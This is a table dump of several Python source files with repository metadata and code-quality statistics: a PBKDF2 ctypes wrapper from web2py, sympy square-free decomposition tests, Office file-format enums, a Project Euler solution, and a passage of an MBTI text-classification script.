hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6aa62343269180c72e1026d8bfdc9d3fa9196b1e
| 7,448 |
py
|
Python
|
gluon/contrib/pbkdf2_ctypes.py
|
Cwlowe/web2py
|
6ae4c3c274be1026cbc45b0fcd8d1180c74b9070
|
[
"BSD-3-Clause"
] | 9 |
2018-04-19T05:08:30.000Z
|
2021-11-23T07:36:58.000Z
|
gluon/contrib/pbkdf2_ctypes.py
|
mohit3011/Quiz-Mate
|
17988a623abde439aef2b43fc8dc3162b5cae15e
|
[
"BSD-3-Clause"
] | 98 |
2017-11-02T19:00:44.000Z
|
2022-03-22T16:15:39.000Z
|
gluon/contrib/pbkdf2_ctypes.py
|
mohit3011/Quiz-Mate
|
17988a623abde439aef2b43fc8dc3162b5cae15e
|
[
"BSD-3-Clause"
] | 9 |
2017-10-24T21:53:36.000Z
|
2021-11-23T07:36:59.000Z
|
# -*- coding: utf-8 -*-
"""
pbkdf2_ctypes
~~~~~~
Fast pbkdf2.
This module implements pbkdf2 for Python using crypto lib from
openssl or commoncrypto.
Note: This module is intended as a plugin replacement of pbkdf2.py
by Armin Ronacher.
Git repository:
$ git clone https://github.com/michele-comitini/pbkdf2_ctypes.git
:copyright: Copyright (c) 2013: Michele Comitini <mcm@glisco.it>
:license: LGPLv3
"""
import ctypes
import ctypes.util
import hashlib
import platform
import os.path
import binascii
import sys
__all__ = ['pkcs5_pbkdf2_hmac', 'pbkdf2_bin', 'pbkdf2_hex']
__version__ = '0.99.3'
def _commoncrypto_hashlib_to_crypto_map_get(hashfunc):
hashlib_to_crypto_map = {hashlib.sha1: 1,
hashlib.sha224: 2,
hashlib.sha256: 3,
hashlib.sha384: 4,
hashlib.sha512: 5}
crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
if crypto_hashfunc is None:
raise ValueError('Unkwnown digest %s' % hashfunc)
return crypto_hashfunc
def _commoncrypto_pbkdf2(data, salt, iterations, digest, keylen):
"""Common Crypto compatibile wrapper
"""
c_hashfunc = ctypes.c_uint32(_commoncrypto_hashlib_to_crypto_map_get(digest))
c_pass = ctypes.c_char_p(data)
c_passlen = ctypes.c_size_t(len(data))
c_salt = ctypes.c_char_p(salt)
c_saltlen = ctypes.c_size_t(len(salt))
c_iter = ctypes.c_uint(iterations)
c_keylen = ctypes.c_size_t(keylen)
c_buff = ctypes.create_string_buffer(keylen)
crypto.CCKeyDerivationPBKDF.restype = ctypes.c_int
crypto.CCKeyDerivationPBKDF.argtypes = [ctypes.c_uint32,
ctypes.c_char_p,
ctypes.c_size_t,
ctypes.c_char_p,
ctypes.c_size_t,
ctypes.c_uint32,
ctypes.c_uint,
ctypes.c_char_p,
ctypes.c_size_t]
ret = crypto.CCKeyDerivationPBKDF(2, # hardcoded 2-> PBKDF2
c_pass, c_passlen,
c_salt, c_saltlen,
c_hashfunc,
c_iter,
c_buff,
c_keylen)
return (1 - ret, c_buff)
def _openssl_hashlib_to_crypto_map_get(hashfunc):
hashlib_to_crypto_map = {hashlib.md5: crypto.EVP_md5,
hashlib.sha1: crypto.EVP_sha1,
hashlib.sha256: crypto.EVP_sha256,
hashlib.sha224: crypto.EVP_sha224,
hashlib.sha384: crypto.EVP_sha384,
hashlib.sha512: crypto.EVP_sha512}
crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
if crypto_hashfunc is None:
raise ValueError('Unkwnown digest %s' % hashfunc)
crypto_hashfunc.restype = ctypes.c_void_p
return crypto_hashfunc()
def _openssl_pbkdf2(data, salt, iterations, digest, keylen):
"""OpenSSL compatibile wrapper
"""
c_hashfunc = ctypes.c_void_p(_openssl_hashlib_to_crypto_map_get(digest))
c_pass = ctypes.c_char_p(data)
c_passlen = ctypes.c_int(len(data))
c_salt = ctypes.c_char_p(salt)
c_saltlen = ctypes.c_int(len(salt))
c_iter = ctypes.c_int(iterations)
c_keylen = ctypes.c_int(keylen)
c_buff = ctypes.create_string_buffer(keylen)
# PKCS5_PBKDF2_HMAC(const char *pass, int passlen,
# const unsigned char *salt, int saltlen, int iter,
# const EVP_MD *digest,
# int keylen, unsigned char *out);
crypto.PKCS5_PBKDF2_HMAC.argtypes = [ctypes.c_char_p, ctypes.c_int,
ctypes.c_char_p, ctypes.c_int,
ctypes.c_int, ctypes.c_void_p,
ctypes.c_int, ctypes.c_char_p]
crypto.PKCS5_PBKDF2_HMAC.restype = ctypes.c_int
err = crypto.PKCS5_PBKDF2_HMAC(c_pass, c_passlen,
c_salt, c_saltlen,
c_iter,
c_hashfunc,
c_keylen,
c_buff)
return (err, c_buff)
try: # check that we have proper OpenSSL or Common Crypto on the system.
system = platform.system()
if system == 'Windows':
if platform.architecture()[0] == '64bit':
libname = ctypes.util.find_library('libeay64')
if not libname:
raise OSError('Library not found')
crypto = ctypes.CDLL(libname)
else:
libname = ctypes.util.find_library('libeay32')
if not libname:
raise OSError('Library libeay32 not found.')
crypto = ctypes.CDLL(libname)
_pbkdf2_hmac = _openssl_pbkdf2
crypto.PKCS5_PBKDF2_HMAC # test compatibility
elif system == 'Darwin': # think different(TM)! i.e. break things!
if [int(x) for x in platform.mac_ver()[0].split('.')] < [10, 7, 0]:
raise OSError('OS X Version too old %s < 10.7.0' % platform.mac_ver()[0])
libname = ctypes.util.find_library('System')
if not libname:
raise OSError('Library not found')
crypto = ctypes.CDLL(os.path.basename(libname))
_pbkdf2_hmac = _commoncrypto_pbkdf2
else:
libname = ctypes.util.find_library('crypto')
if not libname:
raise OSError('Library crypto not found.')
crypto = ctypes.CDLL(os.path.basename(libname))
_pbkdf2_hmac = _openssl_pbkdf2
crypto.PKCS5_PBKDF2_HMAC # test compatibility
except (OSError, AttributeError):
_, e, _ = sys.exc_info()
raise ImportError('Cannot find a compatible cryptographic library '
'on your system. %s' % e)
def pkcs5_pbkdf2_hmac(data, salt, iterations=1000, keylen=24, hashfunc=None):
if hashfunc is None:
hashfunc = hashlib.sha1
err, c_buff = _pbkdf2_hmac(data, salt, iterations, hashfunc, keylen)
if err == 0:
raise ValueError('wrong parameters')
return c_buff.raw[:keylen]
def pbkdf2_hex(data, salt, iterations=1000, keylen=24, hashfunc=None):
return binascii.hexlify(pkcs5_pbkdf2_hmac(data, salt, iterations, keylen, hashfunc))
def pbkdf2_bin(data, salt, iterations=1000, keylen=24, hashfunc=None):
return pkcs5_pbkdf2_hmac(data, salt, iterations, keylen, hashfunc)
if __name__ == '__main__':
try:
crypto.SSLeay_version.restype = ctypes.c_char_p
print(crypto.SSLeay_version(0))
except:
pass
import platform
if platform.python_version_tuple() < ('3', '0', '0'):
def bytes(*args):
return str(args[0])
for h in [hashlib.sha1, hashlib.sha224, hashlib.sha256,
hashlib.sha384, hashlib.sha512]:
print(binascii.hexlify(pkcs5_pbkdf2_hmac(bytes('secret', 'utf-8') * 11,
bytes('salt', 'utf-8'),
hashfunc=h)))
| 38.194872 | 88 | 0.569683 | 850 | 7,448 | 4.732941 | 0.223529 | 0.0609 | 0.041014 | 0.032811 | 0.49043 | 0.434999 | 0.338553 | 0.338553 | 0.272682 | 0.222719 | 0 | 0.034061 | 0.341702 | 7,448 | 194 | 89 | 38.391753 | 0.786457 | 0.116273 | 0 | 0.309353 | 0 | 0 | 0.054685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057554 | false | 0.05036 | 0.064748 | 0.021583 | 0.179856 | 0.014388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6aa7fd8436efabe5593a8174e9772f897fb7aec0
| 4,465 |
py
|
Python
|
sympy/polys/tests/test_sqfreetools.py
|
eriknw/sympy
|
b7544e2bb74c011f6098a7e886fd77f41776c2c4
|
[
"BSD-3-Clause"
] | 7 |
2015-01-14T06:55:33.000Z
|
2018-08-11T14:43:52.000Z
|
sympy/polys/tests/test_sqfreetools.py
|
pbeltran/sympy-1
|
94f92b36731c2bebe6de1037c063c2a258a8a399
|
[
"BSD-3-Clause"
] | 1 |
2018-02-19T04:56:04.000Z
|
2018-02-19T04:56:04.000Z
|
sympy/polys/tests/test_sqfreetools.py
|
pbeltran/sympy-1
|
94f92b36731c2bebe6de1037c063c2a258a8a399
|
[
"BSD-3-Clause"
] | 1 |
2016-04-24T14:39:22.000Z
|
2016-04-24T14:39:22.000Z
|
"""Tests for square-free decomposition algorithms and related tools. """
from sympy.polys.rings import ring
from sympy.polys.domains import FF, ZZ, QQ
from sympy.polys.polyclasses import DMP
from sympy.polys.specialpolys import f_polys
from sympy.utilities.pytest import raises
f_0, f_1, f_2, f_3, f_4, f_5, f_6 = f_polys()
def test_dup_sqf():
R, x = ring("x", ZZ)
assert R.dup_sqf_part(0) == 0
assert R.dup_sqf_p(0) is True
assert R.dup_sqf_part(7) == 1
assert R.dup_sqf_p(7) is True
assert R.dup_sqf_part(2*x + 2) == x + 1
assert R.dup_sqf_p(2*x + 2) is True
assert R.dup_sqf_part(x**3 + x + 1) == x**3 + x + 1
assert R.dup_sqf_p(x**3 + x + 1) is True
assert R.dup_sqf_part(-x**3 + x + 1) == x**3 - x - 1
assert R.dup_sqf_p(-x**3 + x + 1) is True
assert R.dup_sqf_part(2*x**3 + 3*x**2) == 2*x**2 + 3*x
assert R.dup_sqf_p(2*x**3 + 3*x**2) is False
assert R.dup_sqf_part(-2*x**3 + 3*x**2) == 2*x**2 - 3*x
assert R.dup_sqf_p(-2*x**3 + 3*x**2) is False
assert R.dup_sqf_list(0) == (0, [])
assert R.dup_sqf_list(1) == (1, [])
assert R.dup_sqf_list(x) == (1, [(x, 1)])
assert R.dup_sqf_list(2*x**2) == (2, [(x, 2)])
assert R.dup_sqf_list(3*x**3) == (3, [(x, 3)])
assert R.dup_sqf_list(-x**5 + x**4 + x - 1) == \
(-1, [(x**3 + x**2 + x + 1, 1), (x - 1, 2)])
assert R.dup_sqf_list(x**8 + 6*x**6 + 12*x**4 + 8*x**2) == \
( 1, [(x, 2), (x**2 + 2, 3)])
assert R.dup_sqf_list(2*x**2 + 4*x + 2) == (2, [(x + 1, 2)])
R, x = ring("x", QQ)
assert R.dup_sqf_list(2*x**2 + 4*x + 2) == (2, [(x + 1, 2)])
R, x = ring("x", FF(2))
assert R.dup_sqf_list(x**2 + 1) == (1, [(x + 1, 2)])
R, x = ring("x", FF(3))
assert R.dup_sqf_list(x**10 + 2*x**7 + 2*x**4 + x) == \
(1, [(x, 1),
(x + 1, 3),
(x + 2, 6)])
R1, x = ring("x", ZZ)
R2, y = ring("y", FF(3))
f = x**3 + 1
g = y**3 + 1
assert R1.dup_sqf_part(f) == f
assert R2.dup_sqf_part(g) == y + 1
assert R1.dup_sqf_p(f) is True
assert R2.dup_sqf_p(g) is False
R, x, y = ring("x,y", ZZ)
A = x**4 - 3*x**2 + 6
D = x**6 - 5*x**4 + 5*x**2 + 4
f, g = D, R.dmp_sub(A, R.dmp_mul(R.dmp_diff(D, 1), y))
res = R.dmp_resultant(f, g)
h = (4*y**2 + 1).drop(x)
assert R.drop(x).dup_sqf_list(res) == (45796, [(h, 3)])
R, x = ring("x", ZZ["t"])
assert R.dup_sqf_list_include(DMP([1, 0, 0, 0], ZZ)*x**2) == \
[(DMP([1, 0, 0, 0], ZZ), 1), (DMP([1], ZZ)*x, 2)]
def test_dmp_sqf():
R, x, y = ring("x,y", ZZ)
assert R.dmp_sqf_part(0) == 0
assert R.dmp_sqf_p(0) is True
assert R.dmp_sqf_part(7) == 1
assert R.dmp_sqf_p(7) is True
assert R.dmp_sqf_list(3) == (3, [])
assert R.dmp_sqf_list_include(3) == [(3, 1)]
R, x, y, z = ring("x,y,z", ZZ)
assert R.dmp_sqf_p(f_0) is True
assert R.dmp_sqf_p(f_0**2) is False
assert R.dmp_sqf_p(f_1) is True
assert R.dmp_sqf_p(f_1**2) is False
assert R.dmp_sqf_p(f_2) is True
assert R.dmp_sqf_p(f_2**2) is False
assert R.dmp_sqf_p(f_3) is True
assert R.dmp_sqf_p(f_3**2) is False
assert R.dmp_sqf_p(f_5) is False
assert R.dmp_sqf_p(f_5**2) is False
assert R.dmp_sqf_p(f_4) is True
assert R.dmp_sqf_part(f_4) == -f_4
assert R.dmp_sqf_part(f_5) == x + y - z
R, x, y, z, t = ring("x,y,z,t", ZZ)
assert R.dmp_sqf_p(f_6) is True
assert R.dmp_sqf_part(f_6) == f_6
R, x = ring("x", ZZ)
f = -x**5 + x**4 + x - 1
assert R.dmp_sqf_list(f) == (-1, [(x**3 + x**2 + x + 1, 1), (x - 1, 2)])
assert R.dmp_sqf_list_include(f) == [(-x**3 - x**2 - x - 1, 1), (x - 1, 2)]
R, x, y = ring("x,y", ZZ)
f = -x**5 + x**4 + x - 1
assert R.dmp_sqf_list(f) == (-1, [(x**3 + x**2 + x + 1, 1), (x - 1, 2)])
assert R.dmp_sqf_list_include(f) == [(-x**3 - x**2 - x - 1, 1), (x - 1, 2)]
f = -x**2 + 2*x - 1
assert R.dmp_sqf_list_include(f) == [(-1, 1), (x - 1, 2)]
R, x, y = ring("x,y", FF(2))
raises(NotImplementedError, lambda: R.dmp_sqf_list(y**2 + 1))
def test_dup_gff_list():
R, x = ring("x", ZZ)
f = x**5 + 2*x**4 - x**3 - 2*x**2
assert R.dup_gff_list(f) == [(x, 1), (x + 2, 4)]
g = x**9 - 20*x**8 + 166*x**7 - 744*x**6 + 1965*x**5 - 3132*x**4 + 2948*x**3 - 1504*x**2 + 320*x
assert R.dup_gff_list(g) == [(x**2 - 5*x + 4, 1), (x**2 - 5*x + 4, 2), (x, 3)]
raises(ValueError, lambda: R.dup_gff_list(0))
| 29.569536 | 100 | 0.519821 | 975 | 4,465 | 2.212308 | 0.082051 | 0.178489 | 0.12981 | 0.156699 | 0.662031 | 0.596198 | 0.504868 | 0.385257 | 0.29949 | 0.223459 | 0 | 0.088722 | 0.255319 | 4,465 | 150 | 101 | 29.766667 | 0.56 | 0.014558 | 0 | 0.135922 | 0 | 0 | 0.00774 | 0 | 0 | 0 | 0 | 0 | 0.572816 | 1 | 0.029126 | false | 0 | 0.048544 | 0 | 0.07767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6aa848925fe885025486d711e7226e473656a954
| 1,377 |
py
|
Python
|
ezno_convert/enums.py
|
ofersadan85/ezno_convert
|
4c5cf7d41c72698e5486068673f170d968a9de27
|
[
"MIT"
] | 2 |
2021-02-07T21:27:04.000Z
|
2021-03-13T06:47:25.000Z
|
ezno_convert/enums.py
|
ofersadan85/ezno_convert
|
4c5cf7d41c72698e5486068673f170d968a9de27
|
[
"MIT"
] | 1 |
2021-02-10T05:45:00.000Z
|
2021-02-10T05:45:00.000Z
|
ezno_convert/enums.py
|
ofersadan85/ezno_convert
|
4c5cf7d41c72698e5486068673f170d968a9de27
|
[
"MIT"
] | null | null | null |
import enum
from typing import Union
@enum.unique
class PPT(enum.Enum):
# Source: https://docs.microsoft.com/en-us/office/vba/api/powerpoint.ppsaveasfiletype
AnimatedGIF = 40
BMP = 19
Default = 11
EMF = 23
External = 64000
GIF = 16
JPG = 17
META = 15
MP4 = 39
OpenPresentation = 35
PDF = 32
PNG = 18
Presentation = 1
RTF = 6
SHOW = 7
Template = 5
TIF = 21
WMV = 37
XPS = 33
app = 'Powerpoint.Application'
extensions = ('.ppt', '.pptx')
@enum.unique
class WORD(enum.Enum):
# Source: https://docs.microsoft.com/en-us/office/vba/api/word.wdsaveformat
DosText = 4
DosTextLineBreaks = 5
FilteredHTML = 10
FlatXML = 19
OpenDocumentText = 23
HTML = 8
RTF = 6
Template = 1
Text = 2
TextLineBreaks = 3
UnicodeText = 7
WebArchive = 9
XML = 11
Document97 = 0
DocumentDefault = 16
PDF = 17
XPS = 18
app = 'Word.Application'
extensions = ('.doc', '.docx')
@enum.unique
class XL(enum.Enum):
# Source: https://docs.microsoft.com/en-us/office/vba/api/excel.xlfixedformattype
# TODO: Implement "SaveAs" methods, see: https://docs.microsoft.com/en-us/office/vba/api/excel.workbook.saveas
PDF = 0
XPS = 1
app = 'Excel.Application'
extensions = ('.xls', '.xlsx')
enum_types = Union[PPT, WORD, XL]
| 20.863636 | 114 | 0.611474 | 177 | 1,377 | 4.751412 | 0.553672 | 0.042806 | 0.085612 | 0.099881 | 0.237812 | 0.237812 | 0.237812 | 0.237812 | 0.237812 | 0.237812 | 0 | 0.065606 | 0.269426 | 1,377 | 65 | 115 | 21.184615 | 0.770378 | 0.251271 | 0 | 0.09434 | 0 | 0 | 0.079922 | 0.021443 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0 | false | 0 | 0.037736 | 0 | 0.924528 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ab5293b9595b159942c1bb0c1e2bfcef5e08aec
| 1,029 |
py
|
Python
|
solutions/PE4.py
|
KerimovEmil/ProjectEuler
|
bc9cb682181c1ac7889ee57c36d32beae7b441a8
|
[
"MIT"
] | 1 |
2022-01-22T19:48:44.000Z
|
2022-01-22T19:48:44.000Z
|
solutions/PE4.py
|
KerimovEmil/ProjectEuler
|
bc9cb682181c1ac7889ee57c36d32beae7b441a8
|
[
"MIT"
] | null | null | null |
solutions/PE4.py
|
KerimovEmil/ProjectEuler
|
bc9cb682181c1ac7889ee57c36d32beae7b441a8
|
[
"MIT"
] | null | null | null |
"""
PROBLEM
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers
is 9009 = 91 × 99.
Find the largest palindrome made from the product of two 3-digit numbers.
ANSWER:
906609
Solve time ~ 0.760 seconds
"""
from itertools import product
import unittest
from util.utils import timeit
class Problem4:
def __init__(self, num_digits):
self.lower = 10 ** (num_digits - 1) - 1
self.upper = 10 ** num_digits - 1
@staticmethod
def is_palindrome(num):
return str(num) == str(num)[::-1]
@timeit
def solve(self):
pds = []
for i, j in product(range(self.lower, self.upper), repeat=2):
if self.is_palindrome(i * j):
pds.append(i * j)
return max(pds)
class Solution4(unittest.TestCase):
def setUp(self):
self.problem = Problem4(3)
def test_solution(self):
self.assertEqual(906609, self.problem.solve())
if __name__ == '__main__':
unittest.main()
| 21.4375 | 114 | 0.640428 | 144 | 1,029 | 4.458333 | 0.493056 | 0.042056 | 0.062305 | 0.074766 | 0.133956 | 0.133956 | 0.133956 | 0.133956 | 0.133956 | 0 | 0 | 0.050781 | 0.253644 | 1,029 | 47 | 115 | 21.893617 | 0.783854 | 0.252673 | 0 | 0 | 0 | 0 | 0.010512 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.208333 | false | 0 | 0.125 | 0.041667 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ab606d6bade1bb254f8ee2b1905c9d3d07e2051
| 11,447 |
py
|
Python
|
ai_analysis.py
|
kwangilkimkenny/chatbot_seq2seq_flask
|
f2f3bda9311c5f2930aebc8ae4a6497597b190e1
|
[
"MIT"
] | null | null | null |
ai_analysis.py
|
kwangilkimkenny/chatbot_seq2seq_flask
|
f2f3bda9311c5f2930aebc8ae4a6497597b190e1
|
[
"MIT"
] | null | null | null |
ai_analysis.py
|
kwangilkimkenny/chatbot_seq2seq_flask
|
f2f3bda9311c5f2930aebc8ae4a6497597b190e1
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import re
import pickle
# plotting
import seaborn as sns
import matplotlib.pyplot as plt
# Tune learning_rate
from numpy import loadtxt
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import StratifiedKFold
# First XGBoost model for MBTI dataset
from numpy import loadtxt
from xgboost import XGBClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
##### Compute list of subject with Type | list of comments
from nltk.stem import PorterStemmer, WordNetLemmatizer
from nltk.corpus import stopwords
from nltk import word_tokenize
import nltk
nltk.download('wordnet')
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.manifold import TSNE
#타입을 숫자로 변환
def get_types(row):
t=row['type']
I = 0; N = 0
T = 0; J = 0
if t[0] == 'I': I = 1
elif t[0] == 'E': I = 0
else: print('I-E incorrect')
if t[1] == 'N': N = 1
elif t[1] == 'S': N = 0
else: print('N-S incorrect')
if t[2] == 'T': T = 1
elif t[2] == 'F': T = 0
else: print('T-F incorrect')
if t[3] == 'J': J = 1
elif t[3] == 'P': J = 0
else: print('J-P incorrect')
return pd.Series( {'IE':I, 'NS':N , 'TF': T, 'JP': J })
#딕셔너리파일 설정
b_Pers = {'I':0, 'E':1, 'N':0, 'S':1, 'F':0, 'T':1, 'J':0, 'P':1}
#리스트를 두개씩 묶어서 리스트로 만듬
b_Pers_list = [{0:'I', 1:'E'}, {0:'N', 1:'S'}, {0:'F', 1:'T'}, {0:'J', 1:'P'}]
def translate_personality(personality):
# transform mbti to binary vector
return [b_Pers[l] for l in personality]
def translate_back(personality):
# transform binary vector to mbti personality
s = ""
for i, l in enumerate(personality):
s += b_Pers_list[i][l]
return s
# We want to remove these from the psosts
unique_type_list = ['INFJ', 'ENTP', 'INTP', 'INTJ', 'ENTJ', 'ENFJ', 'INFP', 'ENFP',
'ISFP', 'ISTP', 'ISFJ', 'ISTJ', 'ESTP', 'ESFP', 'ESTJ', 'ESFJ']
unique_type_list = [x.lower() for x in unique_type_list]
# Lemmatize
stemmer = PorterStemmer()
lemmatiser = WordNetLemmatizer()
# Cache the stop words for speed
cachedStopWords = stopwords.words("english")
def pre_process_data(data, remove_stop_words=True, remove_mbti_profiles=True):
list_personality = []
list_posts = []
len_data = len(data)
i=0
for row in data.iterrows():
i+=1
if (i % 500 == 0 or i == 1 or i == len_data):
print("%s of %s rows" % (i, len_data))
##### Remove and clean comments
posts = row[1].posts
temp = re.sub('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', ' ', posts)
temp = re.sub("[^a-zA-Z]", " ", temp)
temp = re.sub(' +', ' ', temp).lower()
if remove_stop_words:
temp = " ".join([lemmatiser.lemmatize(w) for w in temp.split(' ') if w not in cachedStopWords])
else:
temp = " ".join([lemmatiser.lemmatize(w) for w in temp.split(' ')])
if remove_mbti_profiles:
for t in unique_type_list:
temp = temp.replace(t,"")
type_labelized = translate_personality(row[1].type)
list_personality.append(type_labelized)
list_posts.append(temp)
list_posts = np.array(list_posts)
list_personality = np.array(list_personality)
return list_posts, list_personality
# read data
# data = pd.read_csv('/Users/jongphilkim/Desktop/Django_WEB/essayfitaiproject_2020_12_09/essayai/mbti_1.csv')
data = pd.read_csv('./mbti/mbti_1.csv')
# get_types 함수 적용
data = data.join(data.apply (lambda row: get_types (row),axis=1))
# load
with open('./mbti/list_posts.pickle', 'rb') as f:
list_posts = pickle.load(f)
# load
with open('./mbti/list_personality.pickle', 'rb') as f:
list_personality = pickle.load(f)
# # Posts to a matrix of token counts
cntizer = CountVectorizer(analyzer="word",
max_features=1500,
tokenizer=None,
preprocessor=None,
stop_words=None,
max_df=0.7,
min_df=0.1)
# Learn the vocabulary dictionary and return term-document matrix
print("CountVectorizer...")
X_cnt = cntizer.fit_transform(list_posts)
#################################################
#save!!! model X_cnt
import pickle
# save
# with open('./essayai/ai_character/mbti/data_X_cnt.pickle', 'wb') as f:
# pickle.dump(X_cnt, f, pickle.HIGHEST_PROTOCOL)
# load
with open('./mbti/data_X_cnt.pickle', 'rb') as f:
X_cnt = pickle.load(f)
#################################################
# Transform the count matrix to a normalized tf or tf-idf representation
tfizer = TfidfTransformer()
print("Tf-idf...")
# Learn the idf vector (fit) and transform a count matrix to a tf-idf representation
X_tfidf = tfizer.fit_transform(X_cnt).toarray()
# load
with open('./mbti/data.pickle', 'rb') as f:
X_tfidf = pickle.load(f)
